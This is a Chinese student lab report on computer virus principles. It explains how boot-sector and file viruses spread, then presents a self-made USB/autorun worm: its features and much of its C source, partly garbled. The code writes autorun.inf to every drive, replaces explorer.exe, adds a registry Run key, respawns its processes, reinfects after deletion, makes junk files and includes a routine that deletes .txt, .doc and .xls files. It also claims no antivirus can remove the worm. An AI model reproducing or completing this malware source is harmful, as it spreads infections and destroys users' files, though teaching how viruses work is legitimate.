1、專業：信息安全 班級： 姓名： 學號： 時間：計算機病毒原理實驗報告信息安全0903班2012年 1 月 3日計算機病毒的傳染機制：1 計算機病毒的傳染方式2 所謂傳染是指計算機病毒由一個載體傳播到另一個載體，由一個系統進入另一個系統的過程。 這種載體一般為磁盤或磁帶，它是計算機病毒賴以生存和進行傳染的媒介。但是，只有載體還不足以使病毒得到傳播。促成病毒的傳染還有一個先決條件，可分為兩種情況，或者叫做兩種方式。3 其中一種情況是，用戶在進行拷貝磁盤或文件時，把一個病毒由一個載體復制到另一個載體上。或者是通過網絡上的信息傳遞，把一個病毒程序從一方傳遞到另一方。這種傳染方式叫做計算機病毒的被動傳染

2、。4 另外一種情況是，計算機病毒是以計算機系統的運行以及病毒程序處于激活狀態為先決條件。在病毒處于激活的狀態下，只要傳染條件滿足，病毒程序能主動地把病毒自身傳染給另一個載體或另一個系統。這種傳染方式叫做計算機病毒的主動傳染。56 計算機病毒的傳染過程7 對于病毒的被動傳染而言，其傳染過程是隨著拷貝磁盤或文件工作的進行而進行的，而對于計算機病毒的主動傳染而言，其傳染過程是這樣的：在系統運行時，病毒通過病毒載體即系統的外存儲器進入系統的內存儲器，常駐內存，并在系統內存中監視系統的運行。在病毒引導模塊將病毒傳染模塊駐留內存的過程中，通常還要修改系統中斷向量入口地址（例如INT 13H 或 INT 2

3、1H） ，使該中斷向量指向病毒程序傳染模塊。這樣，一旦系統執行磁盤讀寫操作或系統功能調用，病毒傳染模塊就被激活，傳染模塊在判斷傳染條件滿足的條件下，利用系統INT 13H 讀寫磁盤中斷把病毒自身傳染給被讀寫的磁盤或被加載的程序，也就是實施病毒的傳染，然后再轉移到原中斷服務程序執行原有的操作。8 計算機病毒的傳染方式基本可分為兩大類，一是立即傳染，即病毒在被執行到的瞬間，搶在宿主程序開始執行前，立即感染磁盤上的其他程序，然后再執行宿主程序；二是駐留內存并伺機傳染，內存中的病毒檢查當前系統環境，在執行一個程序或D1R 等操作時傳染磁盤上的程序，駐留在系統內存中的病毒程序在宿主程序運行結束后，仍可活

4、動，直至關閉計算機。910 系統型病毒傳染機理11 計算機軟硬盤的配置和使用情況是不同的。軟盤容量小，可以方便地移動交換使用，在計算機運行過程中可能多次更換軟盤；硬盤作為固定設備安裝在計算機內部使用，大多數計算機配備一只硬盤。系統型病毒針對軟硬盤的不同特點采用了不同的傳染方式。系統型病毒利用在開機引導時竊獲的INT 13 控制權，在整個計算機運行過程中隨時監視軟盤操作情況，趁讀寫軟盤的時機讀出軟盤引導區，判斷軟盤是否染毒，如未感染就按病毒的寄生方式把原引導區寫到軟盤另一位置，把病毒寫入軟盤第一個扇區，從而完成對軟盤的傳染。染毒的軟盤在軟件交流中又會傳染其他計算機。由于在每個讀寫階段病毒都要讀引

5、導區，既影響微機工作效率，又容易因驅動器頻繁尋道而造成物理損傷。系統型病毒對硬盤的傳染往往是在計算機上第一次使用帶毒軟盤進行的，具體步驟與軟盤傳染相似，也是讀出引導區判斷后寫入病毒。1213 文件型病毒傳染機理14 當執行被傳染的.COM 或 .EXE 可執行文件時，病毒駐人內存。一旦病毒駐人內存，便開始監視系統的運行。當它發現被傳染的目標時，進行如下操作：15 （1）首先對運行的可執行文件特定地址的標識位信息進行判斷是否已感染了病毒；16 （2）當條件滿足，利用INT13H將病毒鏈接到可執行文件的首部或尾部或中間，并存入磁盤中；17 （3）完成傳染后，繼續監視系統的運行，試圖尋找新的攻擊目標

6、。文件型病毒通過與磁盤文件有關的操作進行傳染，主要傳染途徑有：（ 1 ）加載執行文件文件型病毒駐內存后，通過其所截獲的INT 21 中斷檢查每一個加載運行可執行文件進行傳染。 加載傳染方式每次傳染一個文件，即用戶準備運行的那個文件，傳染不到那些用戶沒有使用的文件。（ 2）列目錄過程一些病毒編制者可能感到加載傳染方式每次傳染一個文件速度較慢，不夠過癮，于是后來造出通過列目錄傳染的病毒。在用戶列硬盤目錄的時候，病毒檢查每一個文件的擴展名，如果是可執行文件就調用病毒的傳染模塊進行傳染。這樣病毒可以一次傳染硬盤一個于目錄下的全部可執行文件。DIR 是最常用的DOS 命令，每次傳染的文件又多，所以病毒的

7、擴散速度很快，往往在短時間內傳遍整個硬盤。對于軟盤而言，由于讀寫速度比硬盤慢得多，如果一次傳染多個文件所費時間較長，容易被用戶發現，所以病毒“忍痛 ”放棄了一些傳染機會，采用列一次目錄只傳染一個文件的方式。（ 3）創建文件過程創建文件是DOS 內部的一項操作，功能是在磁盤上建立一個新文件。已經發現利用創建文件過程把病毒附加到新文件上去的病毒，這種傳染方式更為隱蔽狡猾。因為加載傳染和列目錄傳染都是病毒感染磁盤上原有的文件，細心的用戶往往會發現文件染毒前后長度的變化，從而暴露病毒的蹤跡。而創建文件的傳染手段卻造成了新文件生來帶毒的奇觀。好在一般用戶很少去創建一個可執行文件，但經常使用各種編譯、連接

8、工具的計算機專業工作者應該注意文件型病毒發展的這一動向，特別在商品軟件最后生成階段嚴防此類病毒。實驗所用病毒介紹：本病毒所具有的功能：1 .在所有磁盤的根目錄生成 和 autorun.inf 文件2 .生成病毒體：c:windowsc:windowsexplorer.exec:windowssystem32dllcacheexplorer.exec:windowssystemmsmouse.dllc:windowssystem32cmdsys.sysc:windowssystem32mstsc32.exe3 .病毒體c:windowsexplorer.exe 感染原 explorer.exe

9、文件，使其不需要修改注冊表做到啟動時在 explorer.exe 前啟動4 .修改注冊表，在 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun設置自啟動項（此操作不使用windowsAPI, 防止用戶對病毒體的發現，并實現并行執行）5 .生成的autorun.inf 改變磁盤的打開方式，使其在 windows2000 以上的系統無論選擇 “打開” 、“雙擊”、“資源管理器”等方式都無法打開分驅，而是以運行病毒的方式取而代之。6 .連鎖能力，將病毒體相連，實現相連復制更新7 .使用進程不斷調用進程，使得在任務管理里無法結束病毒

10、進程8 .不斷搜索磁盤，只要發現未感染病毒的一律感染，病毒刪除后1秒內再建9 .生成垃圾文件（DESTORY_感染_任意數字）5個于C盤下10 .附帶刪除文件函數（為防止危害，本函數默認不執行）本病毒到目前為止任何殺毒軟件都無法將其查殺本病毒單機默認使用對機器無害（破壞代碼已屏蔽）提供病毒卸載程序（保存為 X.BAT ,雙擊運行即可卸載）： 病毒源程序：/* SVCHOST.C */* SVCHOST.EXE */* SVCHOST.COM */#include<stdio.h> /*標準輸入輸出 */#include<string.h> /* 字符串操作 */#inc

11、lude<stdlib.h> /* 其它函數 */#include<process.h> /*8 程控制*/#include<dir.h> /* 目錄函數 */# define SVCHOST_NUM 6 /*關鍵位置病毒復制數量*/# define RUBBISH_NUM 5 /* 垃圾文件數量 */# define REMOVE_NUM 5 /*刪除文件數 */*/*/*=/*文件 AUTORUN.INF 內容：1 .自動運行 SVCHOST.com2 .覆蓋默認打開命令，使用病毒體作為新的打開方式3 .覆蓋默認資源管理器命令，使病毒體作為新的命令方式*

12、/char *autorun="AutoRunnopen="SVCHOST.com /s"nshellopen=打開 (&O)nshellopenCommand="SVCHOST.com /s"nshellexplore=W源管理 (&X)nshellexploreCommand="SVCHOST.com /s""/*= /*添加注冊表項：1.自動運行生成病毒體 C:windows*/charWindowsCurrentVersionRunn"wjview32"="C:

13、windows /s""*/*=/*函數：復制文件復制源：in巾le 目的地：outfile成功返回0，失敗返回1*/int copy(char *infile,char *outfile)FILE *input,*output;char temp;if(strcmp(infile,outfile)!=0 && (input=fopen(infile,"rb")!=NULL) && (output=fopen(outfile,"wb")!=NULL)while(!feof(input) fread(&a

14、mp;temp,1,1,input);fwrite(&temp,1,1,output); fclose(input); fclose(output); return 0;else return 1;*/*/*函數：通過explorer 自動運行成功返回0，失敗返回1,2*/int autorun_explorer()FILE *input;if(input=fopen("c:windowssystemexplorer.exe","rb")!=NULL)fclose(input);remove("c:windows$temp$"

15、);remove("c:windowssystem32dllcache$temp$");return 1;copy("c:windowsexplorer.exe","c:windowssystemexplorer.exe");rename("c:windowsexplorer.exe","c:windows$temp$");rename("c:windowssystem32dllcacheexplorer.exe","c:windowssystem32dllc ac

16、he$temp$");if(copy("SVCHOST.com","c:windowsexplorer.exe")=0 &&copy("SVCHOST.com","c:windowssystem32dllcacheexplorer.exe")=0)return 0; elsereturn 2;)/*/*函數：添加注冊表項成功返回0,失敗返回1*/int add_reg().FILE *output;if(output=fopen("$","w")!=

17、NULL) fprintf(output,regadd);fclose(output);spawnl(1,"c:windowsregedit.exe"," /s $",NULL);) ) /*=: /*/*/函數：復制病毒 + Autorun.inf自動運行*/void copy_virus()int i,k;FILE *input,*output;char *files_svchostSVCHOST_NUM="","c:windows","c: windowssystemMSMOUSE.DLL"

18、;,"c:windowssystem32cmdsys.sys","c:win dowssystem32mstsc32.exe","c:windowsexplorer.exe"char temp220="c:","c:autorun.inf"for(i=0;i<SVCHOST_NUM;i+)if(input=fopen(files_svchosti,"rb")!=NULL)fclose(input);for(k=0;k<SVCHOST_NUM;k+)copy(fil

19、es_svchosti,files_svchostk);i=SVCHOST_NUM;for(i=0;i<SVCHOST_NUM;i+)if(input=fopen(files_svchosti,"rb")!=NULL) fclose(input);for(k=0;k<24;k+)copy(files_svchosti,temp0);if(output=fopen(temp1,"w")!=NULL)fprintf(output,"%s",autorun);fclose(output);)temp00+;temp10+;)i=

20、SVCHOST_NUM;)/*=/*函數：制造垃圾文件*/void make_rubbish()int i;FILE *output;srand(0);for(i=0;i<RUBBISH_NUM;i+) int n;char s30;n=rand();sprintf(s,"C:DESTORY_ 感染 _%d",n);if(output=fopen(s,"w")!=NULL)fprintf(output,"%ld%s",n*n,s);fclose(output);)/*=/*函數：刪除文件*/*/*/void remove_fil

21、es()long done;int i;struct _finddata_t ffblk;char *remove_files3="*.txt","*.doc","*.xls"for(i=0;i<3;i+)if(_findfirst(remove_filesi,&ffblk)=-1) continue;while(!done)remove();_findnext(done,&ffblk);_findclose(done);*/ /*= /*主程序使用DEV-CPP 32位C工程 實現.C程序脫離命令行界面，于后臺執行*/int main(int argc,char *argv)int contral=0;if(argc>1)if(strcmp(argv1,"/s")=0)goto next1;autorun_explorer();spawnl(1,"c:windowssystemexplorer.exe",NULL);next1